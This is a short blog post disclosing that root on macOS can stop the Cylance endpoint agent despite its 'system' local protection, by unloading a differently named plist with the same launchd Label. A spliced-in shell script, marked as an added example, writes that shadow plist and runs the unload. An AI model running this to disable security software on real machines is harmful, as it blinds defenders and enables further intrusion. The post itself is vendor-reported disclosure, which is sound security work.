Cylance local protection seems a bit daft
25 Jul 2019 19:14 | macOS | security
On a mac if you set Cylance’s “local protection” to “system” it seems to disallow all filesystem access to the CylanceSvc service’s launchd plist file:
/Library/LaunchDaemons/com.cylance.agent_service.plist
This access is completely denied even to the root user. At first glance this would appear to prevent all users, including root, from stopping the service.
However, launchd does not key on the filename when processing one of these files. You can have one called foo.plist and, if its Label key is set to the same value as the Cylance one, e.g. "com.cylance.agent_service", it can be used to stop the Cylance service.
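The steps above as an added shell example (not code from the original post or from Cylance): it writes a plist under a different filename whose Label matches the Cylance daemon's, shows that the Label is what the file carries, and then hands that file to launchctl. The label and the protected path come from the post; the shadow filename under /tmp, the placeholder ProgramArguments, and the use of `launchctl unload` (rather than the newer `bootout` subcommand) are assumptions.

```shell
#!/bin/sh
# Added example: launchd matches jobs by the Label key, not by the plist's filename.

LABEL="com.cylance.agent_service"
REAL_PLIST="/Library/LaunchDaemons/${LABEL}.plist"   # unreadable even as root in "system" mode

# Write a minimal, well-formed launchd plist carrying the given Label to $2.
# The ProgramArguments value is a placeholder; unload only needs the Label to match.
write_shadow_plist() {
  label="$1"; out="$2"
  cat > "$out" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>${label}</string>
    <key>ProgramArguments</key>
    <array><string>/usr/bin/true</string></array>
</dict>
</plist>
EOF
}

# Print the <string> that follows <key>Label</key>, i.e. the value launchd keys on.
plist_label() {
  sed -n '/<key>Label<\/key>/{n;s/.*<string>\(.*\)<\/string>.*/\1/p;}' "$1"
}

main() {
  shadow="/tmp/foo.plist"   # assumed location; any readable path will do

  # The real file is inaccessible under "system" local protection, even as root.
  cat "$REAL_PLIST" >/dev/null 2>&1 || echo "$REAL_PLIST: not readable (expected)"

  write_shadow_plist "$LABEL" "$shadow"
  echo "shadow plist $shadow carries Label: $(plist_label "$shadow")"

  # Unload via the shadow file; launchd resolves the job by its Label.
  sudo launchctl unload "$shadow"
  sudo launchctl list | grep -q "$LABEL" || echo "$LABEL is no longer loaded"
}

# Only touch launchd when explicitly asked, so the functions can be sourced safely.
if [ "${1:-}" = "run" ]; then
  main
fi
```

Run it as `sh shadow.sh run` on the affected Mac; without the argument it only defines the functions. Note that `launchctl list` may still show the label for a moment while the service exits, so re-check after a second if the final message does not appear.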
So this local protection is fairly weak in terms of stopping the root user from disabling Cylance. Also, weirdly, if I use a separate plist file to stop the service while it's in this mode, the original plist is left accessible after starting the service back up again.
Reported both of these issues to Cylance; they seemed to already be aware of the first one and just said it's a limitation of the operating system. Presumably, with SIP locking down all the system files, there's only so much they can do to interrupt things being done as root.
